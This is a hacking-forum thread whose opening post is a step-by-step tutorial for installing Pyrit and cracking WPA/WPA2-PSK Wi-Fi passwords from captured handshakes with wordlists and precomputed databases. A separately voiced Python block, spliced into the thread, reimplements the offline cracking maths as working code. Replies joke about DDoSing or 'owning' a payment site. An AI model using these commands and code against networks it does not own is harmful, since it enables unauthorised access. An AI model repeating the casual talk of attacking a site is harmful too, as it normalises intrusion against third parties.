Wireless network penetration: Using Pyrit (WPA/WPA2-PSK cracker)
  • rx-
    Posts: 169
    Hey, since I noticed an increase in wifi tutorials, I decided to write a follow-up too. Today I will show you how to use Pyrit to precompute part of the WPA/WPA2-PSK authentication phrase, thus making the whole wifi cracking process easier and faster.
    Note: this tutorial is done for Debian (the only distro on my test server), but since we are compiling from source, it's not hard to apply it to other distros.

    NOTE: I know you hate adf.ly, but c'mon, you just wait a second and I get money so I can pay my online bills, it's fair :)
    Official Pyrit Page

    What we will need:
    Debian-based distro (the one that uses aptitude)

    These libraries and tools:
    Linux: zLib, OpenSSL, python, gcc, make, subversion (svn)
    Mac OS: Xcode

    Now, download the source for the latest Pyrit
    http://adf.ly/2fbW (or use official page Downloads section when using wget/curl)

    And if you have an nVidia card, download this package:
    http://adf.ly/2fbi
    And if you have other compatible cards, download this one:
    http://adf.ly/2fbu

    Now, untar Pyrit, cd into it and run

    python setup.py build


    If everything worked well, you can now proceed to install it

    sudo python setup.py install


    Now, all you need to install is the OpenCL or nVidia CUDA package. Here is the part of the official Pyrit wiki on how to install it:

    --------------------------------
    ... support for Nvidia-CUDA

    Get yourself a copy of the CUDA-Toolkit from http://www.nvidia.com/object/cuda_get.html. You need to modify either $PATH and ldconfig or setup.py if you choose not to install the Toolkit into either '/usr/local/cuda' or '/opt/cuda' so CPyrit-CUDA's installation routine can find Nvidia's compiler 'nvcc'. You also need to have Nvidia's proprietary hardware-drivers installed in the way that fits your OS.

    Switch to the directory holding CPyrit-CUDA's source-code and compile and install it just like you did with Pyrit:

    cd cpyrit-cuda-0.3.0
    python setup.py build
    sudo python setup.py install

    This will list your GPUs:

    pyrit list_cores


    ... support for OpenCL

    OpenCL is currently supported by Nvidia (GeForce GPUs), AMD (ATI Radeon GPUs and SSE3-capable CPUs) and IBM (CELL B.E. CPUs). You can get a copy of the SDKs that are required to build CPyrit-OpenCL from the following sites (registration required):

    Nvidia OpenCL SDK/Toolkit
    ATI Stream SDK

    Please see the drivers' installation instructions for how to get everything up and running. The SDKs usually include simple demos and examples. First try to get those demos working and you'll most probably have no problems installing CPyrit-OpenCL.

    Switch to the directory holding CPyrit-OpenCL's source-code and compile and install it just like you did with Pyrit:

    cd cpyrit-opencl-0.3.0
    python setup.py build
    sudo python setup.py install


    This will list your GPUs:

    pyrit list_cores

    --------------------------------

    Great, so now you have Pyrit working! I can show you how to work with it.

    Once again, cd to the Pyrit source directory, and then to the test directory, where you should see three files:


    dict.gz - wordlist
    wpa2psk-linksys.dump.gz - dump of a WPA2-PSK handshake
    wpapsk-linksys.dump.gz - dump of a WPA-PSK handshake

    Note that the two dumps are provided with the package; if you want your own, Pyrit will understand any logfile in the pcap format.

    To analyze a dump file (assuming we will use the provided files):

    pyrit -r wpapsk-linksys.dump.gz analyze

    What you will see is a list of AccessPoints and clients, their MAC addresses, the total number of APs and the total number of packets in the dump file. Using this, you can decide which client-AP communication you want to attack. Below is an example of how you can easily crack the password for the wifi:


    pyrit -r wpapsk-linksys.dump.gz -i dict.gz -b 00:0b:86:c2:a4:85 attack_passthrough

    This basically uses the dumpfile wpapsk-linksys.dump.gz and the dictionary file dict.gz to attack the AccessPoint 00:0b:86:c2:a4:85 and tries to find the password among the words from the dictionary.


    Since cracking is very expensive in CPU time, we will use Pyrit's database, which in time can potentially grow up to a few million entries, using a file DB or a MySQL DB.


    pyrit eval

    This will give you a basic picture of how big your database is. For now, it will be empty.

    To input passwords in your database, use this:

    pyrit -i dict.gz import_passwords

    This will import all passwords from dict.gz into your DB, also removing duplicates and sorting out passwords that can't be used with WPA/WPA2-PSK secured networks.


    pyrit -e linksys create_essid

    Will create an essid called linksys and prepare it for batch processing, which is done like this:

    pyrit batch

    Pyrit will now process the DB, computing the key for each essid:password combination and storing it for later use.

    For attacking an essid using your database, use this:

    pyrit -r wpapsk-linksys.dump.gz attack_db

    A while later, ta-daa! Your password is cracked! I hope you liked this tut, please post comments and feedback!
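To make the precomputation idea behind the post concrete, here is an added worked example (my own code, not Pyrit's and not from the post above) of the maths under the commands: the PMK that `pyrit batch` precomputes per ESSID, the passphrase filter that `import_passwords` applies, and the PTK/MIC check that `attack_passthrough` and `attack_db` run against the captured handshake. Everything in the sample handshake (MAC addresses, nonces, EAPOL frame bytes, wordlist, secret passphrase) is constructed for the demo and the frame is not a real 802.11 layout; the only real-world value used is the IEEE 802.11i test vector for passphrase "password" with SSID "IEEE".

```python
import hashlib
import hmac
from typing import Dict, Iterable, Optional

# Added example, not Pyrit's code. Sample values below are constructed.


def usable_passphrase(p: str) -> bool:
    """802.11i PSK passphrase: 8..63 printable ASCII characters.
    This is the filter Pyrit applies on import_passwords."""
    return 8 <= len(p) <= 63 and all(32 <= ord(c) <= 126 for c in p)


def pmk(passphrase: str, essid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096 iterations, 32 bytes).
    This is the expensive step (8192 HMAC-SHA1 calls per candidate) and it
    depends only on passphrase + ESSID, which is why 'pyrit batch' can
    precompute it per ESSID without any handshake at all."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid.encode(), 4096, 32)


def prf512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11i PRF-512: concatenated HMAC-SHA1 with a one-byte counter."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def ptk(pmk_: bytes, ap: bytes, sta: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK from PMK plus the two MACs and two nonces seen in the handshake."""
    data = min(ap, sta) + max(ap, sta) + min(anonce, snonce) + max(anonce, snonce)
    return prf512(pmk_, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, frame_mic_zeroed: bytes, wpa2: bool = True) -> bytes:
    """MIC over the EAPOL-Key frame with its MIC field zeroed.
    WPA2 (key descriptor v2) uses HMAC-SHA1-128, WPA (v1) uses HMAC-MD5."""
    if wpa2:
        return hmac.new(kck, frame_mic_zeroed, hashlib.sha1).digest()[:16]
    return hmac.new(kck, frame_mic_zeroed, hashlib.md5).digest()


def mic_matches(pmk_: bytes, hs: dict) -> bool:
    """Cheap step: 4 HMACs for the PTK, 1 for the MIC. KCK = PTK[0:16]."""
    kck = ptk(pmk_, hs["ap"], hs["sta"], hs["anonce"], hs["snonce"])[:16]
    return hmac.compare_digest(eapol_mic(kck, hs["eapol"], hs["wpa2"]), hs["mic"])


def attack_passthrough(hs: dict, wordlist: Iterable[str]) -> Optional[str]:
    """Like 'pyrit attack_passthrough': full PBKDF2 per candidate, nothing stored."""
    for cand in wordlist:
        if usable_passphrase(cand) and mic_matches(pmk(cand, hs["essid"]), hs):
            return cand
    return None


def batch(essids: Iterable[str], wordlist: Iterable[str]) -> Dict[str, Dict[bytes, str]]:
    """Like 'pyrit batch': PMK for every ESSID:password pair. The dict keys
    also dedupe passwords, as import_passwords does."""
    return {e: {pmk(p, e): p for p in wordlist if usable_passphrase(p)} for e in essids}


def attack_db(hs: dict, db: Dict[str, Dict[bytes, str]]) -> Optional[str]:
    """Like 'pyrit attack_db': only the PTK/MIC step remains per candidate.
    A table built for a different ESSID is useless for this handshake."""
    for pmk_, cand in db.get(hs["essid"], {}).items():
        if mic_matches(pmk_, hs):
            return cand
    return None


# --- constructed sample handshake (demo values, not a real capture) ---
SECRET = "linksys-demo-2012"
AP = bytes.fromhex("000b86c2a485")
STA = bytes.fromhex("001122334455")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
EAPOL = b"\x02\x03\x00\x5f\x02" + bytes(94)  # fake EAPOL-Key frame, MIC zeroed
HANDSHAKE = {"essid": "linksys", "ap": AP, "sta": STA, "anonce": ANONCE,
             "snonce": SNONCE, "eapol": EAPOL, "wpa2": True}
HANDSHAKE["mic"] = eapol_mic(
    ptk(pmk(SECRET, "linksys"), AP, STA, ANONCE, SNONCE)[:16], EAPOL)

WORDLIST = ["short", "password", "linksys123", SECRET, "admin1234"]  # constructed

if __name__ == "__main__":
    print("passthrough:", attack_passthrough(HANDSHAKE, WORDLIST))
    db = batch(["linksys", "NETGEAR"], WORDLIST)
    print("attack_db:  ", attack_db(HANDSHAKE, db))
```

Run it as a plain script; it prints the recovered passphrase both ways. The point to take from it: `batch` spends the PBKDF2 cost once per ESSID:password pair, so every later handshake for that ESSID costs only the PTK/MIC step, while a table for another ESSID (the `NETGEAR` entry above) contributes nothing, which is exactly why `create_essid` has to name the target network before `batch`.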
  • nice2kn0w
    Posts: 4
    good one :) thanks for that
  • Xin
    Posts: 3,251
    Nice, yeah adf.ly is fine (as long as you spend it on iexploit elite ;) ) haha, but yeah adf is fine, it's sharecash which gets on my nerves
    Xin
  • rx-
    Posts: 169
    Xin said:

        Nice, yeah adf.ly is fine (as long as you spend it on iexploit elite ;) ) haha, but yeah adf is fine, it's sharecash which gets on my nerves

    Yeah, sharecrap is shit, because there are no offers for my country :) adf.ly just lets you wait a little, that's cool IMO :) I wanna spend the money on a VPS so we can have a separate IRC server, better challenges, etc... :)
  • h4ckingURLife
    Posts: 125
    Nice tutorial. Thanks for the post.

    Xin said:

        Nice, yeah adf.ly is fine (as long as you spend it on iexploit elite ;) ) haha, but yeah adf is fine, it's sharecash which gets on my nerves

    Yeah, let's scan shitcash for vuln ports and hack that shit. j/k
    We can just DDoS it. :D
  • rx-
    Posts: 169
    let's own it, way better than DDoSing it :)